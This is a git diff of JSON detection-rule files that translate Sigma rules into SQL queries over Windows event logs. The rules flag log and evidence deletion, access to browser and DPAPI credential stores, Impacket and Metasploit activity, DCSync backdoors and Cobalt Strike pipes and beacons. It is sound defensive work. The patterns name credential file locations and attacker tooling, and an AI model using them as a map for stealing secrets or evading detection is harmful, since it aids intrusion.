- "attack.initial_access", - "attack.t1133" + "attack.discovery", + "attack.t1087.002" ], "falsepositives": [ - "Unknown" + "If source account name is not an admin then its super suspicious" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4661' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 
'SAM\\_GROUP' ESCAPE '\\')) AND ((ObjectName LIKE '%-512' ESCAPE '\\' OR ObjectName LIKE '%-502' ESCAPE '\\' OR ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-505' ESCAPE '\\' OR ObjectName LIKE '%-519' ESCAPE '\\' OR ObjectName LIKE '%-520' ESCAPE '\\' OR ObjectName LIKE '%-544' ESCAPE '\\' OR ObjectName LIKE '%-551' ESCAPE '\\' OR ObjectName LIKE '%-555' ESCAPE '\\') OR ObjectName LIKE '%admin%' ESCAPE '\\')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_delete_win_unusual_deletion_by_dns_exe.yml" + "filename": "win_security_account_discovery.yml" }, { - "title": "Prefetch File Deleted", - "id": "0a1f9d29-6465-4776-b091-7f43b26e4c89", + "title": "Possible Impacket SecretDump Remote Activity", + "id": "252902e3-5830-4cf6-bf21-c22083dfd5cf", "status": "experimental", - "description": "Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence", - "author": "Cedric MAURUGEON", + "description": "Detect AD credential dumping using impacket secretdump HKTL", + "author": "Samir Bousseaden, wagga", "tags": [ - "attack.defense_evasion", - "attack.t1070.004" + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Windows\\\\Prefetch\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.pf' ESCAPE '\\') AND NOT (NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\ADMIN$' ESCAPE '\\' AND RelativeTargetName LIKE '%SYSTEM32\\\\%' ESCAPE '\\' AND RelativeTargetName LIKE '%.tmp%' ESCAPE '\\')" ], - "filename": "file_delete_win_delete_prefetch.yml" + "filename": "win_security_impacket_secretdump.yml" }, { - "title": "File Deleted Via Sysinternals 
SDelete", - "id": "6ddab845-b1b8-49c2-bbf7-1a11967f64bc", + "title": "Metasploit SMB Authentication", + "id": "72124974-a68b-4366-b990-d30e0b2a190d", "status": "test", - "description": "Detects the deletion of files by the Sysinternals SDelete utility. It looks for the common name pattern used to rename files.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Alerts on Metasploit host's authentications on the domain.", + "author": "Chakib Gzenayi (@Chak092), Hosni Mribah", "tags": [ - "attack.defense_evasion", - "attack.t1070.004" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Legitime usage of SDelete" + "Linux hostnames composed of 16 characters." ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%.AAA' ESCAPE '\\' OR TargetFilename LIKE '%.ZZZ' ESCAPE '\\') AND NOT ((TargetFilename LIKE '%\\\\Wireshark\\\\radius\\\\dictionary.alcatel-lucent.aaa' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID IN ('4625', '4624') AND LogonType = '3' AND AuthenticationPackageName = 'NTLM' AND WorkstationName REGEXP '^[A-Za-z0-9]{16}$') OR (ProcessName = '' AND EventID = '4776' AND Workstation REGEXP '^[A-Za-z0-9]{16}$')))" ], - "filename": "file_delete_win_sysinternals_sdelete_file_deletion.yml" + "filename": "win_security_metasploit_authentication.yml" }, { - "title": "Backup Files Deleted", - "id": "06125661-3814-4e03-bfa2-1e4411c60ac3", + "title": "Possible Shadow Credentials Added", + "id": "f598ea0c-c25a-4f72-a219-50c44411c791", "status": "experimental", - "description": "Detects deletion of files with extensions often used for backup files. 
Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.", - "author": "frack113", + "description": "Detects possible addition of shadow credentials to an active directory object.", + "author": "Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.credential_access", + "attack.t1556" ], "falsepositives": [ - "Legitime usage" + "Modifications in the msDS-KeyCredentialLink attribute can be done legitimately by the Azure AD Connect synchronization account or the ADFS service account. These accounts can be added as Exceptions. (From elastic FP section)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.VHD' ESCAPE '\\' OR TargetFilename LIKE '%.bac' ESCAPE '\\' OR TargetFilename LIKE '%.bak' ESCAPE '\\' OR TargetFilename LIKE '%.wbcat' ESCAPE '\\' OR TargetFilename LIKE '%.bkf' ESCAPE '\\' OR TargetFilename LIKE '%.set' ESCAPE '\\' OR TargetFilename LIKE '%.win' ESCAPE '\\' OR TargetFilename LIKE '%.dsk' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-KeyCredentialLink')" ], - "filename": "file_delete_win_delete_backup_file.yml" + "filename": "win_security_susp_possible_shadow_credentials_added.yml" }, { - "title": "PowerShell Console History Logs Deleted", - "id": "ff301988-c231-4bd0-834c-ac9d73b86586", + "title": "Access Token Abuse", + "id": "02f7c9c1-1ae8-4c6a-8add-04693807f92f", "status": "experimental", - "description": "Detects the deletion of the 
PowerShell console History logs which may indicate an attempt to destroy forensic evidence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "This rule tries to detect token impersonation and theft. (Example: DuplicateToken(Ex) and ImpersonateLoggedOnUser with the LOGON32_LOGON_NEW_CREDENTIALS flag.)", + "author": "Michaela Adams, Zach Mathis", "tags": [ "attack.defense_evasion", - "attack.t1070" + "attack.privilege_escalation", + "attack.t1134.001" ], "falsepositives": [ - "Unknown" + "Anti-Virus" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\PSReadLine\\\\ConsoleHost\\_history.txt' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND LogonProcessName = 'Advapi' AND AuthenticationPackageName = 'Negotiate' AND ImpersonationLevel LIKE '\\%\\%1833' ESCAPE '\\')" ], - "filename": "file_delete_win_delete_powershell_command_history.yml" + "filename": "win_security_access_token_abuse.yml" }, { - "title": "IIS WebServer Access Logs Deleted", - "id": "3eb8c339-a765-48cc-a150-4364c04652bf", + "title": "Metasploit Or Impacket Service Installation Via SMB PsExec", + "id": "6fb63b40-e02a-403e-9ffd-3bcc1d749442", "status": "experimental", - "description": "Detects the deletion of IIS WebServer access logs which may indicate an attempt to destroy forensic evidence", - "author": "Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation", + "author": "Bartlomiej Czyz, Relativity", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1570", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "During uninstallation of the IIS service", - "During log rotation" + "Possible, different agents with a 8 character binary 
and a 4, 8 or 16 character service name" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\inetpub\\\\logs\\\\LogFiles\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.log' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4697' AND ServiceFileName REGEXP '^%systemroot%\\\\[a-zA-Z]{8}\\.exe$' AND ServiceName REGEXP '(^[a-zA-Z]{4}$)|(^[a-zA-Z]{8}$)|(^[a-zA-Z]{16}$)' AND ServiceStartType = '3' AND ServiceType = '0x10') AND NOT (ServiceName = 'PSEXESVC'))" ], - "filename": "file_delete_win_delete_iis_access_logs.yml" + "filename": "win_security_metasploit_or_impacket_smb_psexec_service_install.yml" }, { - "title": "Tomcat WebServer Logs Deleted", - "id": "270185ff-5f50-4d6d-a27f-24c3b8c9fef8", + "title": "Possible PetitPotam Coerce Authentication Attempt", + "id": "1ce8c8a3-2723-48ed-8246-906ac91061a6", "status": "experimental", - "description": "Detects the deletion of tomcat WebServer logs which may indicate an attempt to destroy forensic evidence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect PetitPotam coerced authentication activity.", + "author": "Mauricio Velazco, Michael Haag", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.credential_access", + "attack.t1187" ], "falsepositives": [ - "During uninstallation of the tomcat server", - "During log rotation" + "Unknown. Feedback welcomed." 
], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Tomcat%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\logs\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%catalina.%' ESCAPE '\\' OR TargetFilename LIKE '%\\_access\\_log.%' ESCAPE '\\' OR TargetFilename LIKE '%localhost.%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*' ESCAPE '\\' AND ShareName LIKE '%\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'lsarpc' AND SubjectUserName = 'ANONYMOUS LOGON')" ], - "filename": "file_delete_win_delete_tomcat_logs.yml" + "filename": "win_security_petitpotam_network_share.yml" }, { - "title": "EventLog EVTX File Deleted", - "id": "63c779ba-f638-40a0-a593-ddd45e8b1ddc", + "title": "Suspicious Scheduled Task Update", + "id": "614cf376-6651-47c4-9dcc-6b9527f749f4", "status": "experimental", - "description": "Detects the deletion of the event log files which may indicate an attempt to destroy forensic evidence", + "description": "Detects update to a scheduled task event that contain suspicious keywords.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.execution", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.evtx' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4702' AND (TaskContentNew LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE 
'%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContentNew LIKE '%regsvr32%' ESCAPE '\\' OR TaskContentNew LIKE '%rundll32%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd%' ESCAPE '\\' OR TaskContentNew LIKE '%/c %' ESCAPE '\\' OR TaskContentNew LIKE '%/k %' ESCAPE '\\' OR TaskContentNew LIKE '%/r %' ESCAPE '\\' OR TaskContentNew LIKE '%powershell%' ESCAPE '\\' OR TaskContentNew LIKE '%pwsh%' ESCAPE '\\' OR TaskContentNew LIKE '%mshta%' ESCAPE '\\' OR TaskContentNew LIKE '%wscript%' ESCAPE '\\' OR TaskContentNew LIKE '%cscript%' ESCAPE '\\' OR TaskContentNew LIKE '%certutil%' ESCAPE '\\' OR TaskContentNew LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContentNew LIKE '%bash.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%bash %' ESCAPE '\\' OR TaskContentNew LIKE '%scrcons%' ESCAPE '\\' OR TaskContentNew LIKE '%wmic %' ESCAPE '\\' OR TaskContentNew LIKE '%wmic.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%forfiles%' ESCAPE '\\' OR TaskContentNew LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContentNew LIKE '%hh.exe%' ESCAPE '\\'))" ], - "filename": "file_delete_win_delete_event_log_files.yml" + "filename": "win_security_susp_scheduled_task_update.yml" }, { - "title": "Exchange PowerShell Cmdlet History Deleted", - "id": "a55349d8-9588-4c5a-8e3b-1925fe2a4ffe", - "status": "experimental", - "description": "Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Windows Defender Exclusion Set", + "id": "e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d", + "status": "test", + "description": "Detects scenarios where an windows defender exclusion was added in registry where an entity would want 
to bypass antivirus scanning from windows defender", + "author": "@BarryShooshooga", "tags": [ "attack.defense_evasion", - "attack.t1070" + "attack.t1562.001" ], "falsepositives": [ - "Possible FP during log rotation" + "Intended inclusions by administrator" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '\\\\Logging\\\\CmdletInfra\\\\LocalPowerShell\\\\Cmdlet\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\_Cmdlet\\_%' ESCAPE '\\')" - ], - "filename": "file_delete_win_delete_exchange_powershell_logs.yml" - }, - { - "title": "Suspicious Access To Browser Credential Files", - "id": "91cb43db-302a-47e3-b3c8-7ede481e27bf", - "status": "experimental", - "description": "Detects suspicious processes based on name and location that access the browser credential stores which can be the sign of credential stealing", - "author": "frack113", - "tags": [ - "attack.t1003", - "attack.credential_access" - ], - "falsepositives": [ - "Antivirus, Anti-Spyware, Anti-Malware Software", - "Backup software", - "Software installed on other partitions other than \"C:\\\"", - "Searching software such as \"everything.exe\" that are installed and are not located in one of the \"filter_programfile\" filter entries" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (((FileName LIKE '%\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Network\\\\Cookies%' ESCAPE '\\' OR FileName LIKE '%\\\\Appdata\\\\Local\\\\Chrome\\\\User Data\\\\Default\\\\Login Data%' ESCAPE '\\' OR FileName LIKE '%\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Local State%' ESCAPE '\\') OR (FileName LIKE '%\\\\Appdata\\\\Local\\\\Microsoft\\\\Windows\\\\WebCache\\\\WebCacheV01.dat' ESCAPE '\\' OR FileName LIKE '%\\\\cookies.sqlite' ESCAPE '\\' OR FileName LIKE '%release\\\\key3.db' ESCAPE '\\' OR FileName LIKE '%release\\\\key4.db' ESCAPE '\\' OR FileName LIKE '%release\\\\logins.json' ESCAPE '\\')) AND NOT (((NewProcessName LIKE 'C:\\\\Program 
Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\WINDOWS\\\\SysWOW64\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\MpCopyAccelerator.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor.exe' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') OR (NewProcessName = 'System' AND ParentProcessName = 'Idle')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4657', '4656', '4660', '4663') AND ObjectName LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\%' ESCAPE '\\')" ], - "filename": "file_access_win_browser_credential_stealing.yml" + "filename": "win_security_defender_bypass.yml" }, { - "title": "Suspicious Access To Windows Credential History File", - "id": "7a2a22ea-a203-4cd3-9abf-20eb1c5c6cd2", - "status": "experimental", - "description": "Detects suspicious processes based on name and location that access the Windows Credential History File.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::credhist\" function\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Azure AD Health Service Agents Registry Keys Access", + "id": "1d2ab8ac-1a01-423b-9c39-001510eae8e8", + "status": "test", + "description": "This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g AD FS).\nInformation from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. 
Federation).\nThis detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\\SOFTWARE\\Microsoft\\ADHealthAgent.\nMake sure you set the SACL to propagate to its sub-keys.\n", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", "tags": [ - "attack.credential_access", - "attack.t1555.004" + "attack.discovery", + "attack.t1012" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (FileName LIKE '%\\\\Microsoft\\\\Protect\\\\CREDHIST' ESCAPE '\\' AND NOT (((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4656', '4663') AND ObjectType = 'Key' AND ObjectName LIKE '\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\ADHealthAgent' ESCAPE '\\') AND NOT ((ProcessName LIKE '%Microsoft.Identity.Health.Adfs.DiagnosticsAgent.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.InsightsService.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.MonitoringAgent.Startup.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.PshSurrogate.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Common.Clients.ResourceMonitor.exe%' ESCAPE '\\')))" ], - "filename": "file_access_win_susp_cred_hist_access.yml" + "filename": "win_security_aadhealth_svc_agent_regkey_access.yml" }, { - "title": "Credential Manager Access", - "id": "407aecb1-e762-4acf-8c7b-d087bcff3bb6", + "title": "Powerview Add-DomainObjectAcl DCSync AD Extend Right", + "id": "2c99737c-585d-4431-b61a-c911d86ff32f", "status": "experimental", - "description": "Detects 
suspicious processes based on name and location that access the windows credential manager and vault.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::cred\" function\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Backdooring domain object to grant the rights associated with DCSync to a regular user or machine account using Powerview\\Add-DomainObjectAcl DCSync Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer", + "author": "Samir Bousseaden; Roberto Rodriguez @Cyb3rWard0g; oscd.community; Tim Shelton; Maxence Fossat", "tags": [ - "attack.t1003", - "attack.credential_access" + "attack.persistence", + "attack.t1098" ], "falsepositives": [ - "Legitimate software installed by the users for example in the \"AppData\" directory may access these files (for any reason)." + "New Domain Controller computer account, check user SIDs within the value attribute of event 5136 and verify if it's a regular user or DC computer account." 
], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((FileName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Credentials\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Credentials\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Vault\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\ProgramData\\\\Microsoft\\\\Vault\\\\%' ESCAPE '\\') AND NOT (((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5136' AND AttributeLDAPDisplayName = 'ntSecurityDescriptor' AND (AttributeValue LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) AND NOT ((ObjectClass IN ('dnsNode', 'dnsZoneScope', 'dnsZone'))))" ], - "filename": "file_access_win_credential_manager_stealing.yml" + "filename": "win_security_account_backdoor_dcsync_rights.yml" }, { - "title": "Suspicious Access To Windows DPAPI Master Keys", - "id": "46612ae6-86be-4802-bc07-39b59feb1309", - "status": "experimental", - "description": "Detects suspicious processes based on name and location that access the Windows Data Protection API Master keys.\nWhich can be a sign of credential stealing. 
Example case would be usage of mimikatz \"dpapi::masterkey\" function\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security", + "id": "4c54ba8f-73d2-4d40-8890-d9cf1dca3d30", + "status": "test", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1555.004" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((FileName LIKE '%\\\\Microsoft\\\\Protect\\\\S-1-5-18\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\Microsoft\\\\Protect\\\\S-1-5-21-%' ESCAPE '\\') AND NOT (((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%&&set%' ESCAPE '\\' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%{0}%' ESCAPE '\\' OR ServiceFileName LIKE '%{1}%' ESCAPE '\\' OR ServiceFileName LIKE '%{2}%' ESCAPE '\\' OR ServiceFileName LIKE '%{3}%' ESCAPE '\\' OR ServiceFileName LIKE '%{4}%' ESCAPE '\\' OR ServiceFileName LIKE '%{5}%' ESCAPE '\\'))" ], - "filename": "file_access_win_dpapi_master_key_access.yml" + "filename": "win_security_invoke_obfuscation_via_var_services_security.yml" } ] diff --git a/rules/rules_windows_sysmon.json b/rules/rules_windows_sysmon.json index d099ae7..66d3986 100644 --- a/rules/rules_windows_sysmon.json +++ b/rules/rules_windows_sysmon.json 
@@ -1,2636 +1,2602 @@ [ { - "title": "DNS Query for MEGA.io Upload Domain - DNS Client", - "id": "66474410-b883-415f-9f8d-75345a0a66a6", + "title": "Malicious Named Pipe", + "id": "fe3ac066-98bb-432a-b1e7-a5229cb39d4a", "status": "test", - "description": "Detects DNS queries for subdomains used for upload to MEGA.io", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a named pipe used by known APT malware", + "author": "Florian Roth (Nextron Systems), blueteam0ps, elhoim", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ - "Legitimate DNS queries and usage of Mega" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%userstorage.mega.co.nz%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '\\\\isapi\\_http' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg2' ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE '\\\\ahexec' ESCAPE '\\' OR PipeName LIKE '\\\\winsession' ESCAPE '\\' OR PipeName LIKE '\\\\lsassw' ESCAPE '\\' OR PipeName LIKE '\\\\46a676ab7f179e511e30dd2dc41bd388' ESCAPE '\\' OR PipeName LIKE '\\\\9f81f59bc58452127884ce513865ed20' ESCAPE '\\' OR PipeName LIKE '\\\\e710f28d59aa529d6792ca6ff0ca1b34' ESCAPE '\\' OR PipeName LIKE '\\\\rpchlp\\_3' ESCAPE '\\' OR PipeName LIKE '\\\\NamePipe\\_MoreWindows' ESCAPE '\\' OR PipeName LIKE '\\\\pcheap\\_reuse' ESCAPE '\\' OR PipeName LIKE '\\\\gruntsvc' ESCAPE '\\' OR PipeName LIKE '\\\\583da945-62af-10e8-4902-a8f205c72b2e' ESCAPE '\\' OR PipeName LIKE '\\\\bizkaz' ESCAPE '\\' OR PipeName LIKE '\\\\svcctl' ESCAPE '\\' OR PipeName LIKE '\\\\Posh%' ESCAPE '\\' OR PipeName 
LIKE '\\\\jaccdpqnvbrrxlaf' ESCAPE '\\' OR PipeName LIKE '\\\\csexecsvc' ESCAPE '\\' OR PipeName LIKE '\\\\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7' ESCAPE '\\' OR PipeName LIKE '\\\\adschemerpc' ESCAPE '\\' OR PipeName LIKE '\\\\AnonymousPipe' ESCAPE '\\' OR PipeName LIKE '\\\\bc367' ESCAPE '\\' OR PipeName LIKE '\\\\bc31a7' ESCAPE '\\' OR PipeName LIKE '\\\\testPipe' ESCAPE '\\' OR PipeName LIKE '\\\\dce\\_3d' ESCAPE '\\'))" ], - "filename": "win_dns_client_mega_nz.yml" + "filename": "pipe_created_mal_namedpipes.yml" }, { - "title": "Suspicious Cobalt Strike DNS Beaconing - DNS Client", - "id": "0d18728b-f5bf-4381-9dcf-915539fff6c2", + "title": "CobaltStrike Named Pipe Pattern Regex", + "id": "0e7163d4-9e19-4fa7-9be6-000c61aad77a", "status": "test", - "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1071.004" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND ((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName LIKE '%.stage.123456.%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (PipeName REGEXP '\\\\mojo\\.5688\\.8052\\.(?:183894939787088877|35780273329370473)[0-9a-f]{2}' OR PipeName REGEXP '\\\\wkssvc_?[0-9a-f]{2}' OR PipeName REGEXP '\\\\ntsvcs[0-9a-f]{2}' OR PipeName REGEXP '\\\\DserNamePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\SearchTextHarvester[0-9a-f]{2}' OR PipeName REGEXP '\\\\mypipe-(?:f|h)[0-9a-f]{2}' OR 
